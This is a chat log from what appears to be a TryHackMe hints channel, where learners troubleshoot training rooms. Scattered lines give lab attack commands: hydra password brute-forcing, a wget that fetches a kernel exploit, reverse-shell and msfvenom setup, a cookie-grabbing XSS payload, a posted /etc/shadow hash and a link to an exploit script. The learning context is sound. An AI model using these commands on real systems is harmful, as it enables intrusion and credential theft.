#room-hints

I'm working on Network Services 2, Task 6, Enumerating SMTP, and I'm all the way to the end, running the Metasploit to get the username. I've looked up a walkthrough and it looks like my options are all set up to match theirs, but I'm not getting any usernames.

I think there's a typo in the user_file option

Oop, I did get an extra s in there.

Yup!

There we, go, got it. Thanks bud!

Doing [Severity 4] XML External Entity - Exploiting in OWASP Top 10 room.
I think I need RCE here, but it's using php function expect, I am not able to execute anything.
I would assume I need way to list directories in order to figure out where this could be, and use cat to read it.

Any hint ?

Ok, I figured it out, it appears that there is standard location in which SSH keys are stored.

I'm trying to find a file using this command but got nothing in the search. This is for Hacking with Powershell module.
Get-ChildItem -Path C:\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue | Select-String "interesting-file.txt"

IMO you can skip the end of the line or ad an * behind .txt This should work: Get-ChildItem -Path C:\ -Include interesting-file.txt -File -Recurse -ErrorAction SilentlyContinue Edit: Sorry, I don’t how so set / escape * character and how to hide spoiler.

I am currently doing Task 8(Challenge) from the room File Inclusion. I am kinda stuck on flag2. Got the Admin Cookie, but I am unable to get the output from /etc/flag2. or to be more clear: I am unable to get output from any file feels like I tried everything I've just learned..trying it with ```
POST /challenges/chall2.php?file=......

the only thing I can imagine now is, that the "file=" part is wrong. but how tf do I find out what the parameter name is(in this case)?

To find out such parameters you could use wfuzz or burpsuite. (in general)

got the flag. had nothing to do with the parameter name

holy cow

god bless my holy cigarette.. it gave me so many good answers in the past

i am so dumb btw

Regular expressions room: I'm stuck on Task 3, 4th question...please help 😅

https://tryhackme.com/room/catregex

Nevermind, just solved it

Hey

I am stuck at intro to digital forensics task 3 4 ques.

aren't there only 3 questions? What's the problem @polar gazelle

Yeah i mean at last ques.

I can't find camera model

exiftool | grep "camera" ?

Does straight line bar denote something special?

Well its not working

Are you in the directory of the file?

Sorry, I forgot to specify the file.

Yes

exiftool *filename* | grep camera

I am in directory

just checked it, it is inside the metadata of the picture

Thus exiftool 😄

😉 but he could run exiftool on the pdf and doc also

I am running on jpg file

Can you paste which command you're doing?

Or verify and paste a screenshott

!docs verify

Bro I can't very

Once i verified back bit now its not working

well do you get any output of the jpg? Use the command @lucid junco mentioned and you should be fine.

There is quite a lot of output but look though it thoroughly or use the grep command

I make it

Thankyou guys

i got ftp, i did ls -al and i found .flag. cd doesn't work and neither does cat. what should i do. echo?

which room ?

hackers

Have you tried downloading it on your machine using get filename ?

no

thx

!

h4cked ?

hackers

linux machine

can you share the link ?

/koth/61011

ok

/games/koth/61011

Madeye's Castle

I'm not sure if the THM servers dropping as I finished the module saved my progress so whilst it was still in my clipboard.

Metasploit Exploitation Task 6: Msfvenom

"What is the other user's password hash?" || $6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002:||

That's more than just the hash

It what way?

Check how the /etc/passwd and /etc/shadow files are formatted and compare it to what you posted as the password hash in the spoiler

https://www.cyberciti.biz/faq/understanding-etcshadow-file/

Let me check I got the right task etc hopefully servers are back up

hello

what should i do here exactly ? if anyone is down to help or explain
https://tryhackme.com/room/agentt

im watching a video about it but...... yeah i still don't get it ]

google the php version

Hello people! Hope everyone is doing good

I need help for "Pyramid of Pain", task 5. I identified the malicious IP in question 1 but nothing malicious appears when testing it with the tools VirusTotal or OPSWAT

Thanks in advance to whoever will help 🙂

edit: found answer in another room but thanks!

Metersploit: Meterpreter

Task 5

The questions want me to open a .txt file for various answer but everything I have tried to open and read that file i just get "stdapi_fs_stat: Operation failed: The system cannot find the file specified."

I've located the file at "C:\Programe Files (x86)\Windows Multimedia Platform\secrets.txt"

Initially I tried cat command, no luck same message

The tried escaping the current directory "c:\windows\system32", I went down to root but i can not even cd to above location?

I tried to above with double \ and //

I have managed to move only really "../" around

I have tried download and get the same message

What am i missing this should be a simple cat command (as hinted by the questions)?

Update: I did some googling and the solution was
|| cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"||

However I tried that a few times and got the same message so I summise the servers where having issue again due to Cyber Advent.

Thank you!

Gave +1 Rep to @alpine kestrel

anyone working in to the quotient room? https://tryhackme.com/room/quotient

completed it about 1-2 days ago... what are you stuck on???

I have no idea what to looking for in the Windows machine related with punctuation. Have checked missing extension files etc.. to figure out Administrator password

hint... it has something to do with something called UnQuoted something something... not giving you the full answer as this is the hints channel

if you really wanna learn this outside of quotient there is the windows priv esc room

Sure - no spoiler! Thanks a lot for the hint.

Gave +1 Rep to @alpine kestrel

I have a question about task 4

https://tryhackme.com/room/reloaded

I found the key but it says incorrect

can anyone help me ?

I am in Phishing emails in action task 3 q1. can someone help me to answer it
I have tried Cyber Chef But doesn't work

https://tryhackme.com/room/phishingemails2rytmuv

Why, what's not working ?

@unborn nebula do you know what command is used to list a directorys contents?

ls

am i right

yup

so run ls on the folders (directorys)

already don

I found postman as answer but it didn't work

postman?

Because only this folder contains files

its folder1, folder2, folder3, folder4

are you sure your in the documents* directory?

run pwd

ok i do

Hey, I am doing the "[Day 5] Brute-Forcing He knows when you're awake". I found the password, but when I try to connect via VNC, the Remmina window just stays black after entering the pw I found before. Am I not waiting long enough? 😮

EDIT: it worked. Just took like 10 minutes to connect via VNC for some reason.

so am on a room called wekor i got initial foothold as WWW-DATA and i can't seem to find a way to Change to another user any hints

hmmmmmmmmmmmmmmmmmmmm

Not sure what the task is asking you to do, it will also be helpful to name the Task and Question you are working on specifically?

I do know that if you type in "How to change users in Linux" you will immediately find your answer. Might need to do some scrolling maybe

It's a very simple command ^

well i performed a SQLI got a shell as www-data after enumerating i found Orka account and it's the only one that can read the user.txt

Do you know the command to change users ?

ik simple command but i found 2 passwords no one seems to work yeah su username

hmmmmmm

okay yea it would be su <username>

Orka lool

nn the problem with the passwords not working

i red previous messages they say the room changed

i feel week n stupid

Check this writeup out

https://erichogue.ca/2021/06/Wekor

Should give you your answer

Scroll down till you see this part

This is totally normal, the most important thing you don't want to do is, QUIT

thnx man ! wish u all the best in ur journeys

Hello I am in SQLMAP room
Sqlmap challenge (task 3)
Question 2.
Who is the current dB user?
I have dumped the database and can see its Nare/nare but question Is showing as incorrect 🤔
Plz advise

Did you try the --current-user flag with sqlmap?

*smacks head on keyboard.. tyvm

I sorry because I be late to reply you

when I Bake the URL it shows the same URL and just a simple different is http become hxxp. and that doesn't help me to answer the question

That's what defanging does, so nobody clicks the malicious link by mistake

It's not asking for the full URL, it's asking for the root domain

does any file exist called access.log in attack box

yes but you should not be looking for it on the attackbox if you are doing linux fundamentals room

you are then meant to check it on the target machine which you ssh into from the attackbox

ssh?

secure shell

linux fundamentals 2 goes through how to connect to that and use it

couldn't understand

ok then i should leave it for now, right?

if you are only on linux fundamnetals 1 yeah

ok thanks

Gave +1 Rep to @alpine kestrel

linux fundamentals one opens in split view but it is not the attackbox but a target machine in split view... not a lot of rooms are like that but some are

if you can't find the flag in the access.log file there should be another file in the same dir with a very similar name that shadow can't recall right now that has the flag

unless that got fixed but doubt it

so i need to do deep search to find this file?

not really

hmmm

then?

never mind that bug has been fixed

it is in your tryhackme users home dir

Hello, need a little hint if I could get one.

In Introduction to LAN and the last question in Task 2 A Primer on Subnetting: What is the name used to identify the device responsible for sending data to another network?

The answer field has the * formatted as ******* ******* (7 space 7).

I thought the answer was going to be network routers but it's not the answer.

I'm not sure what it's looking for now. Am I close? There is no hint button on this one so not sure what it's looking for now...

Any hint would be appreciated...

Nevermind... found it...

d** g**

lol nm

hi guys, im trying to complete this task on THM, "What is the content of user.txt ##This task is optional. You will use penetration testing techniques to gain access to this device."

i used sudo find / -type d -name "user.txt"

the result shows '/run/user/123/gvfs': Permission denied

how do i proceed from here?

Id say you need escalated privileges to acces that file, search for a way to get that

There are alot of privilege escalation cheatsheets and info available

im in a root accountt

i'll try to figure

Oh

Then just try to cd into the directory

As root should just work

it's a /bin/false user

i changed it and accessed it, but i cant find the user.txt file inside the account

not sure what i did wrong

Also to filter out permission denied requests of find, use /dev/null clears the input alot

Try type -f instead of -d maybe

Believe you are now searching for directories

yea i tried it

shows the same directory

same results

Which room is this?

its a lab for my univerty

university*

Homework or?

nah, its a optional thing

hacking is interesting, i need to figure this out

Are you sure it is the right dir?

Maybe try a .txt search or try grep to make sure

ok

#general message @clear fiber

ok thank you D=

No worries

Best of luck

Hello

yo

Hey all 🙂 I want some help with Hydra. I used dirbuser and found a dir that needs basic authentication. I have the username, but my Hyndra query doesn't work and I'm not sure how to move on. I cant see from the webpage how my query should be either.

please post your command

it should include http-get

hydra -l USERNAME -P /home/User/wordlists/rockyou.txt [IP] http-get "/:username=^USER^&password=^PASS^:F=incorrect" -V

Shouldn't it be http-post-form ?

try this 👆🏻

hm it seems I'm mixing things up o.O

@grizzled valve what task is it an how does the login look?

sorry for the confusion^^

I tried http-post-form first, but it didn't work.

do you get any errors?

are you mentioning the endpoint properly ?

@woeful crag The room is ToolsRus. Basic http auth. Post-form is giving me 16 valid passwords.

@pine dust Hmm, I'm not sure I'm following. Example? 🙂

[ERROR] optional parameters must have the format X=value: username=^USER^&password=^PASS^:
This is what I get when doing http-get

16 valid passwords probably means your error rule is set incorrectly, try one of em manual

the endpoint should be ´protected´ if I remember correct

I haven't solved the room so i cant help you here but my best guess is that you are mentioning the endpoint incorrectly and since @woeful crag is saying the same, that must be it.

any advice on how the query should be instead of what I've written?

http-post-form "/endpoint:data:check for string"

that should be the ending structure

Not completly sure I get it, but I'll try 😛 Thanks both of you for the help

https://tryhackme.com/room/walkinganapplication
TASK -- 3
QUESTION NUMBER -- 3 

I am not able to get this one...
Where should I take guidance regarding it ?

Have you found the directory? It should literally guide you to this flag

Not able to follow the instructions given.. can you plz guide me through?

You need to enumerate the webserver with eg dirbuster. Then visit the found directories on the server and look for the flag

in fact you only need to inspect the source code

Using dirbuster is already beyond the scope of that room/task.
You can just inspect the source code, you can see various files that getting included, in the path you can see the name of the directory that is holding these assets.

These directories shouldn't be accessible directly, but maybe you can 🙂

Room Splunk 2, last question with scheduled tasks
I found some ||encoded stuff that leads to IP and a URI path||, but it is shorter than the answer

nvm

stuck on Linux Privilege Escalationz task 5, question 1. i can't seem to wget the kernel exploit needed from the hosted web server. the command i am using on the target machine is wget http://10.10.222.148:9001/root/Desktop/ofs.c and im receiving an http 404 file not found message, when i can clearly see the file on the desktop of the host machine

the cve in question is CVE-2015-1328 if that helps as well

nvm i figured it out by creating the same file with the kernel exploit in the /var/tmp directory of the target machine

@drowsy zinc you gave wget the absolute path of the ofc.c file, that is why you received a 404. if you start the webserver from the Desktop then it would be http://10.10.222.148:9001/ofs.c

can I get a hint with Zeek Task 5

i thought you had to provide the path? otherwise how would it know where the file is amongst all the directories and etc?

You're right, you need to provide the path. But where ever you start your webserver, that directory becomes the root of the webserver (like "/" on you local is the root). So when you start a webserver at /home/username/Desktop there is no reference to your local /root/anything

in this particular exampe / == /home/username/Desktop (assuming you started it there)

ah, i see. so starting the webserver in the / directory would've solved the issue then?

since that would be a valid path to the Desktop directory from the root directory?

correct but you would made literally everything available

true but if im the only one wgetting things from said server...🤷‍♂️

Path is relative to the location of the website root, not the absolute system path

right right

losferatos did a great job explaining it tbh

Ohsint where to find his password? I dont want to google it cuz that would possibly reveal too much

have you find his blog?

ye

also github and twitter

somewhere in the blog i could say

damn my laziness, i was looking into it and could not find anything, just not in a new tab if you know what i mean

thanks tho

yeah look into it

ye i found it the second i opened it correctly

Hello guys, im trying to generate a reverse shell with msfvenom in aspx format but for some reason the x64 architecture is incompatible with the payload. Tried to generate it with no architecture but when executing it don't give me a shell, guess it needs to be x64 bc the machine is running on windows server 2016, any help is appreciate it

Is there any reason you need the x64 or you can use x32 ?

I didn't try x32, but the server is on windows server 2016, I did a bit of research and i found its build in x64-x86, i tried x86 and it didn't give me the shell tho

Can't understand why x64 is incompatible with the payload

Hello, its a bit off topic but I was wondering if anyone could give me some hints about a CTF I've been trying to do. Its not from THM or any similar websites so there's not a walkthrough I can find and follow. If anyone's happy for me to PM them let me know please 👍

Welcome 🙂 we generally don't provide help like that as we cannot know whether you are participating in an active CTF or doing homework etc. ( we don't help because it can be considered cheating ). Also, this channel is for THM rooms only 🙂 gl with your ctf!

how to extract data from a .wav file??

binwalk, stego, etc - what room/task?

I understand 🙏 thank you for replying

Gave +1 Rep to @topaz umbra

Hey, have a question about Splunk101, trying to input the last 2 questions, and I'm not understanding what answers it wants. I did the exception !="France" and got the value, and also with the VPN events for a particular IP.

It doesn't like either answer I put, so i'm puzzled what the answers might be.

Actually figured it out. I am a moron 🙂

I closed out of splunk, reopened it, re-uploaded the .json file, so I had 2x the event logs.

@wanton elk psychobreak

Linux Privilege Escalation Task 5

I found this task to not really have told you before hand how to use the exploit.

This link helped me figure out how to execute/run the exploit.

|| https://www.youtube.com/watch?v=aQfShUs6TGA||

linuxprivesc room 2nd question "run the id cmd, what is the result" - pasting the result in isnt right 🤔 but googling for it yields a different result in someone's walk through and that is deemed correct...

the result I got includes entries for ...27(sudo),109(netdev),119(wireshark)... and some others...

hahaha

nvm

damn every stinkin time

im an idiot. please ignore.

how do i compile an exploit when there is no gcc available on the vuln machine?

then you have to compile it locally and transfer it to the target host

either compile it on your attacking machine which would be cross compiling and could fail with some interesting errors now and again... or figure out what version of gcc can be used on the machine and upload gcc to the machine to compile it on the target

I usually kick up a VM of the correct emulated architecture and compile on that emulated VM. It's a lot slower, but less likely to fail

try static compilation with -o

need a lil clarification....exinfo gave me different coordinates as comapared to the (HINT) answer in a room....

https://tryhackme.com/room/introdigitalforensics

task3 - QUESTION 2 -- Using exiftool or any similar tool, try to find where the kidnappers took the image they attached to their document. What is the name of the street?

Did you go to the cordinates?

yes....I did..shows somewhere in LONDON ...

Wait, I only just understood your question.

Did you get the answer?

didnt get the answer....tried a few answers....

Can you give me the cordinates you got, I think it's the way you enter the, in Google and I'm trying to remember.

sure...these are what I got 51° 30' 8.650507"N

0° 5' 6.455754" W

I have the answer from other web portals as MILK street...but I have no clue of how that is....the answer ..

Yeah, I remember how.

You get the cord ||51 deg 30' 51.90" N, 0 deg 5' 38.73" W||

But you need to change the DEG to ° and combine them.

||51°30' 51.90" N, 0°5' 38.73" W||

So 5 deg 3 = 5°3

oh..i got the wrong cordinates?

ahhhh...I got it....i totally went with exinfo instead of exiftool

my bad....

phew!...I just got the answer right...but also noticed a bit of difference in latitudes and longitudes in exif and exiftool for the image same file ...

what do you think? @lucid junco

I'm not sure.

I downloaded it on my vm and used exiftool.

couldn't find the answer?

Think DNS. 🙂

thanks it worked

Gave +1 Rep to @hexed crescent

im doing basic pentesting room right now ... so do i have to || brute force ssh || or does it have something to do with || apache tomcat || ?

the first thing you mentioned

I am doing brainpan1 right now, i am a bit confused as my ||shellcode is stored after eip and is located at esp+8bytes or eip+4bytes||, is there any way, i can overwrite eip with jmp [||ESP||+8]? I think I would need to translate this to opcode right? Btw. the architecture is x86 and i am debugging with wine on linux and do not have the immunity debugger.

Hi there, any hints on Crypted room? Ive found one user and password, but not the one i need, got dbase backup with "destroyed" files, and info how db was encrypted. Cracking another users password but i think im looking in a wrong direction...

Hello, im doing the room "Buffer Overflows" https://tryhackme.com/room/bof1 (Task 7 - Overwriting Function Pointers) and I have the following question regarding Task 8:

I was able to identify the structure of the code in the memory:

400567
............... special
400581
400582
............... normal
400592
400593
............... other
4005a8
4005a9
............... main
4005a2

The buffe is 14 bytes long.

Everything inside this range will bring me to the normal execution.
Our goal is to provoke an overflow that brings us to special and then other.
so [14] + *Something

The question is:
Why writing the ASCI of the first address of [special or other] brings us to there? I could find a correlation to this characters and going to this specific address:
0000400567 (big endian)
6705400000 (little endian) ==> ASCII== *Something

*something = this word is a spoiler of the answer, for those who have done the room will understand what it means, for the others, it is better to try the room first.

Any one available to give me a nudge on year-of-the-fox

which part are you in?

Hey anyone online I need help for Psycho break room

You'll get a faster answer if you just state what you're having an issue with.

okay

check this out

here waiting for reverse shell

10.17.14.47 is my IP

listening on 4444 on nc

nothing reflecting in /home/kidman/.the_eye.txt also which I have modified to be written

Did you test it by running the script manually?

your rev shell shebang is not python3

and just overwrite the file if u able to write into it anyway

no need to append

where's import socket?

yeah import socket was missing i fixed it but still not working

no issue basically understood the concept no need to stuck here now

Hi,
for Nmap practical, i have done the ICMP thing as taught. what am i doing wrong here

It's suppose to be N but mine is up

That's not ICMP pinging

Can you try "ping" command instead?

Re-run the scan without a -PE and see what the result is. You can also consult the man page for nmap to see what all the flags do

Really?

I’ll check that

Hi everyone! I'm in Phishing Emails1 Task 5, trying to decode an email. I took out the header, then stuck it in Cyber Chef, from Base 64. I'm still getting jibberish. I've checked a few walkthrough's for a hint, but that's all they do and it works for them. Is there another step I'm missing?

Hey, could you send some screenshots of what you're doing? You will need to verify if not already done

!docs verify

hi i'm in vulnet room

i cldn't find the machine IP so not sure who to start this room

I think the VM was removed,

Probably best sticking it in #room-bugs

thanks

Hello guys i hope all doing good i am in encryption room as part of crypto101 i got a question that is okey to share your public key the response is yes but what if the data was encrypted by a public not a private one ?

Hey Yassine, with PGP (as an example), person A needs to know person B's public key to encrypt their message. Then only person B (unless they've shared their private key with someone else) can decrypt it. Not even person A can decrypt their own message since it was encrypted with person B's public key.

So to answer your question, in order to encrypt a message for someone, you need to have their public key, hence why it's called a "public" key. The private key is only used for decryption.

hi i'm at holo room again

i kept getting hosts down, not sure why

Yes i understood it thank you.

Gave +1 Rep to @unborn moon

And signing

hello i need help

intro to defensive security task 3

@proven bridge

Please be patient and don't ping him, It's just rude. If you wait, there are volunteer people to help you

ok

sorry

Which section did you get stuck on?

task 3

sorry fro late reply

But which part of it?

i m gonna dm

Wait, C'mon.. Read my bio

oh sorry

!docs verify

if you wanna post screenshots

thanks

but nvm i have solved ot myself

You need to open Split View screen from the top-right

ik

Is that email2.txt? Hints, in order. Try with each before the next.

1. ||There is a buried hint in this server under the search email2.txt||
2. ||You will decode, edit the file, and||
3. ||save it as another type.||

hey guys

I am doing Theseus and I am at the ||last part of it. I have ariadne's password on Labyrinth.lxd. How do I reach Athens.lxd. Only SSH seems to be open||

can anyone give me a nudge?

No hints for the Theseus box

Hi, I am doing the yara room by cmnatic and sucessfully used yargen. When I run yara/loki on the suspicious file2, yara just prints the file path. Loki doesn't detect anything (still saying it's clean), even though the file2.yar is in the signature-base directory. So I can't continue :/

Any idea how to fix this? The generated file has all the strings and I could even answer the task 9 just by checking the generated file.

is there not a yara dir in the signature base dir

I am doing task 10 in the john room and I cannot run rar2john without using a workaround by being in it's folder and using './'. Anyone know why is that the case or how to fix it?

You could use the full path to it or add the necessary directory to the PATH variable

Or move rar2john to a directory that is in the PATH variable

Yes, but why does zip2john work normally and rar2john not?

Is zip2john in the same directory as rar2john ?

Yes

Top and bottom

If you do which zip2john what path does it say?

And that screenshot is what path ?

I don't think I understand your question

The screenshot with all the files you posted, what's the full path to that directory?

If you do pwd inside that directory, it's giving you the path

Oh

I'm in 2 different terminal windows btw

Okay, well then there you have it, there is another zip2john in /usr/local/bin while there is no rar2john there

Is that how it's supposed to be or is that some kind of oversight in the attackbox?

Not sure tbh 😄

Well the room does not mention it so it seems like an oversight.

Thanks tho

find command to the rescue

!docs Verify

!docs

!docs verify

!docs api

!docs koth

!docs free-path

im doing basic pentesting room and i got || ssh private and public key files of kay and i have already changed the permission to 600 || and when i connect to kay with that file, i got asked || to provide passphrase || ... so im thinking this || DEK-INFO || might have something to do with passphrase ... any hints?

You need to crack the passphrase. Create a hash of the key ||(ssh2john)|| file and crack it ||with john||

need help ... doing pickle rick CTF and im stuck at || /assets URL with images|| and i tried to || extract metadata from images by using exiftool and xxd to see any hidden messages || but didnt work ... any hints?

Did you check the source code and robots.txt?

Yep already found || username || and robots.txt but i dont get the text inside robots.txt

did you see a ||login page||

can anyone assist me in vendetta tast1?

i m stuck on vergil flag...

Was robots.txt a blank page?

i found it now

i found something that starts with "W" and i typed that in URL ... page is not found

Maybe it's something else, you have a username, ||could it be a password?||

Thanks, this was the problem. Yara is supposed to print the file path when matching, but I forgot about the subdirectory for Loki.

Gave +1 Rep to @alpine kestrel

anybody advise me with nmap pracrical?

practical*

i don't understand "Does the target (MACHINE_IP)respond to ICMP (ping) requests (Y/N)?" what is the target IP address??

who is the target?

Are you in the Nmap tutorial

I see my attackbox IP address but I have no idea who the target it is

yes I am

Give I second I have to logon

Also I cannot use Sudo on the attackbox machine

I have to go out be back in 20 mins

thanks for help in advance

On the Attackbox you should be the root user, so no need for sudo. And for your other question, there is probably another VM you need to start, it should be attached to the task and can be started with the green "start machine button". Once booted, you can view the IP at the top of the room, underneat the score chart

I believe he stepped out for a few minuets

Yeah I saw 🙂

i'm back

i deploy the machine and I get my own kali machine with attackbox and IP

but there is no option to open another machine nor can I find reference to a hosts IP Address or network

Use what you've learnt to scan the target machine and answer the following questions! Question is which target machine? its really not clear at all

I have opened a full browser based machine window, so I now know the root password as it states it on the page before the browser opens... You would never know unless you open a machine in it's own window

DM me

are you using a VM

no

ok you should see a blue button at the top of the Nmap module the blue button is the attack box

TryHackMe attack machine

on Task 1 there is a green button that says Start Machine this is the machine you are attacking

when you click the blue button a linux machine opens when you click the green button it gives you an IP address of the machine you are attacking

If you need more help DM me

I finished this entire module

my attack machine root@ip-10-10-220-84

the green button states the following?

You are connected via AttackBox

Your machines IP is 10.10.220.84

To access target machines you need to either:

AttackBox
Use a browser-based attack machine

send a screen shot

Can you take a snippet

one sec

This is the green button you need to click, in task 1

I think you're clicking on this one, which is your Attackboxes IP

I direct messeged you

Did you manage to help them out?

still working I believe he got both machines working

Cool, thanks

Gave +1 Rep to @dapper fern

Am I in trouble with Robocop

Yes sir hope I amm not in trouble with Robocop

No not at all, on the contrary 🙂

Well he is all good now I helped him

He is almost done with that module

I'm kinda stuck on tokyoghoul666
Task 4 step 3/4.

Not sure how to ask a question without spoiling, but I found the hidden directory with the ****/index.php page in.
it looks like I'm supposed to see another gif when I click the menu, nothing loads though.

Any hint?

Have you used any encoding, at all?

Not for this step, am I supposed to do something, in order to see the flower?

You're on the right track...

Is there a way you can manipulate that to show some thing else?

Maybe some sort of ||LFI|| ?

Ohhh thanks!
I don't have the solution yet, but I do know how to continue investigating

Thanks!

Can I get a hint on "safezone"?

I'm stuck on the privesc

I've got the files user, but I don't know what to do

I haven't found any id vulnerabilities

Nothing in the SQL database either

Run a || ls -la / || command. Is there any directory that catches your eye?

files@safezone:/sys$ du -sh /* 2>/dev/null                                                                                                                       [32/143]
15M     /bin
145M    /boot                                                                       
0       /dev                                                                        
6.8M    /etc                                                                                                                                                             
56K     /home                  
0       /initrd.img     
0       /initrd.img.old
847M    /lib                     
4.0K    /lib64
16K     /lost+found                                                                 
8.0K    /media
4.0K    /mnt                   
4.0K    /opt
0       /proc                                                                       
4.0K    /root                                                                       
580K    /run                                                                        
15M     /sbin
8.0K    /snap   
4.0K    /srv
1.9G    /swapfile                                                                   
0       /sys                                                                        
40K     /tmp                             
1.2G    /usr
768M    /var                    
0       /vmlinuz                                                                    
0       /vmlinuz.old        

The only one was the snap directory, but there wasn't anything useful there

I did notice /opt had the yash-group though

That's odd. Maybe poke around in there to see if we can leverage something

I did finish the box already

There was an internal webpage on port 8000

Thanks for your time though

Not sure the answer they are wanting and how its formatted can anyone help? It's in the windows fundamentals 1 section of pre-security

1. Which selection will hide/disable the Task View button?

2.Besides Clock and Network, what other icon is visible in the Notification Area?

need help with the the intro to offensive hacking

i enter the gobuster command as follow gobuster -u http://fakebank.com -v wordlist.txt dir

reread the command they gave you

Are you on a VM, or a split screen machine?

Hi, I am in MAL: Malware Introductory task 9 and I can't find Bin file when I open PEiD. Can someone help me ?

Hello all....I'm having trouble with a Task 2 question in the Wireshark: Traffic Analysis room. The question: Which UDP port in the 55-70 port range is open? I don't want the answer but rather a better hint at how to find this. I've answered the other questions. I can find the UDP traffic but having issues with the appropriate filter for port ranges. Thanks a million

My hint would be using the udp.port filter

Also, you can use things like == >= <= for ranges

I'd also like some help myself, I'm stuck trying to get the foothold on the vulnnet box, but I've tried basically everything and no dice

The only thing I've found is the ||broadcast subdomain||.

Hi all. Red team recon room - Q6 - seems like something is off with the name of the author of the "Censys email address" module for Recon-NG - someone figured it out..something with a typo in the name (apparently). ive browsed through the revisions of the actual module file containing the author field, but theres no real hints there. anyone? 🙂

you can do marketplace info <module> to see information about modules

Sigh - thank you for that one. i can see now that it queries their online thing, so it didnt pop up in my github repo search. thanks for that.

Gave +1 Rep to @ivory meadow

Hello all ... i am a beginner and currently trying to solve Lazyadmin room, i proceeded by scanning with nmap and found a ssh open port, i am trying to log in to the port but don't know how to get the password for it . Can someone nudge me in the right direction ?

check the other open ports first

do more enumeration of other services and maybe you will figure out how to get into ssh

ok... let me give it a shot

Hello, working on a john the ripper room and had a bit of trouble with cracking a hash containg a salt 🙂

Im doing a CTF XSS challenge.

I want to grab the cookies. Trying to craft <script>alert(document.cookie)</script> in the web URL
But Im getting the error Forbidden input(`,',",/,string) Ive tried encoding this with URL/HTML etc but still no luck.
Basically the one char that I have to encode is "/" but cant find any alternatives.

Any suggestions?

Please tag me if you reply.

Specify your exact issue please

Thanks for the reply, actually figured it out yesterday 🙂

Gave +1 Rep to @quick holly

Anytime :)

Hi, trying to solve CCT2019 Task 1 - anyone who can help out? We got to extracting ||the binary from the pcap TCP stream that follows the ICMP chat, but the hash does not match the md5 hash in the chat. This leads us to believe its probably encrypted. We then tried decrypting the file using cryptcat and the password from the "The Net" movie reference, but this did not succeed either. || We're a bit stuck trying to extract this payload. Anyone who got further?

Hey i m in room -Principles of Security and stuck on task 4 don't know how to write it down can anyone help?

its showing me to write it in this formatting: The x Model Look at the direction of the arrows and the text next to them to understand what directions can read up/down depending upon the model

thtis is how i have done it

The Bell-La Padula Model Look at the direction of the arrows and the text next to them to understand what directions can read up and not down

How can I download files on my attackbox

Or is it safe to sign in the THM on the attackbox

??

what do you mean by signing in?

Oh, I don't think it's a problem

However keep in mind everything you need for room should be inside of the attackbox.

I was doing the John the ripper room and couldn’t download the hash files

Oh then you might copy the URL of material files and download or Sign in tryhackme in attackbox as you said

You can also download it on your host PC and copy inside of the txt file and then create new file in attackbox with the copied hash

Tried that .. #
But I was looking to work only on the attackbox

I appreciate anyway

you will just copy inside of the txt file as it's an MD5 hash it won't be so long. And then in attackbox:
nano hash1.txt and paste hash

I wouldn't.

Attackboxes are public facing on the internet.

They're not hidden behind your NAT.

So I thought too

So how do I download files on my attackbox for task

Aren't they already on the attackbox?

I can’t seem to locate it

I'm booting up an attackbox, but as it's an older room the materials may have been removed from the VM.

It might be worthwhile asking @steady stratus if he can add them, but I've not seen Ben around recently, so I don't know how busy they are.

Hi i am having an issue with the complete beginner course, i completed the intro to cyber security course before the beginner one on accident. In the intro to linux room I cannot follow along with it because I am signed into the root account not the tryhackme@linux1 like it shows in the room. can anyone help me with this, i am new i hope this made sense lol. thanks!

Did you deploy Attackbox or Room machine ?

i believe it was the attackbox

Can you try one attached in the room?

You may have have booted up the wrong machine.

oh okay i am starting up the one that was attached to the room now

It's an in-browser machine that you can interact

that worked thank you! i didn't realize they were different.

Hey guys, im doing Pickle Rick

and im trying to find a way to exploit the web server

i stuck on the 1. part as i dont know what vuln to use

/start using

if someone is able could i have help in the vc so i can share my screen? i dont understand what is going wrong

Help with what?

Hello Guys !

Hope you are all well,
Im doing the Anthem box and im stuck at the 4 questions

Did you read the hint?

I think i have to use the rockyou file to bruteforce the login page ?

rockyou.txt is for password bruteforcing

hydra + rockyou.txt

No, it's about a file that tells web crawlers on what they are allowed to crawl and what portions of the webpage they are not allowed to crawl

mmmh

It's a very basic file, which nearly every webpage has.
Just google for "file to tell webcrawler what to crawl"

ok thank I'll do it rn

robots.txt ?

Right, so if you request that file on the target webpage, you'll find your answer

i requested it on the target

I found it

again stuck

where?

I found it

mk

i got help from someone else thank you tho!

Gave +1 Rep to @left thunder

Hi. Could someone please give me a hint on Password attacks task 8, question 4? I have been working on this for an hour and haven't had any luck. I am using this command: hydra -l phillips -P newlist.txt 10.10.95.33 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed" -v. I tried using crunch to generate a 1 though 5 character wordlist.

What if "Login failed" is also somewhere in the source code for successful login attempts ?

Hello folks,
Im solving the Secret Recipe room.
And im stuck in the question of everything.exe. and the number of seconds Proton VPN was in focus.
Can someone nudge me in the right direction with some hints.

Thanks. I am now solving it with ffuf instead of hydra. So that i can filter by size.

Gave +1 Rep to @left thunder

Well, you could also just change the condition in hydra, the task is giving you an example on to what to change the condition to

Thanks. I solved both.

Hello just looking for some tip; i'm doing the Basic malware RE room. Now it says don't open debugger and don't execute the code to know the answer. Well when I call my 'strings' function on those files, it just doesn't do anything.. Can someone put me in the right direction?

not sure if you had a chance doing cyber advent 2022 but there was a great room with cyberchef, I did not do room you are enquiring about but I would definitely give it a go if you didn't

Ooh right i did that room! Thanks

I had issue in Skynet room with hydra. When running password list found against Milesdyson email login. Every password came back valid thought my failed login response was problem. What room are you both talking about?

resolve dns for the link breachad. i think u wont be able to see breachad in your GUI. try resolvectl. note that in the walkthrough, in the attack box, the command is systemd-resolve for the link breachad. i believe systemd-resolve is phased out if im not wrong

The room is "Password attacks"

Having issues with the burp suite basics room. Task 13, i'm looking around at my target but can't seem to find the url with the flag in it. I adjusted my scope to only take trafic from my target

Can you verify and show a screenshot of your target sitemap in burp ?

!docs verify

Hi guys I can’t use search sploit script Because I have an error inside the script but it’s correct
(Print error)

I’m inside “simple ctf” room

If the script is python, can you try python2 instead?

Same print error

can i see?

One moment ..I’m coming home 😅

That’s the same error

Hey, try this script https://github.com/e-renna/CVE-2019-9053/blob/master/exploit.py

Ok i’will try asap

Thanks 👍🏻

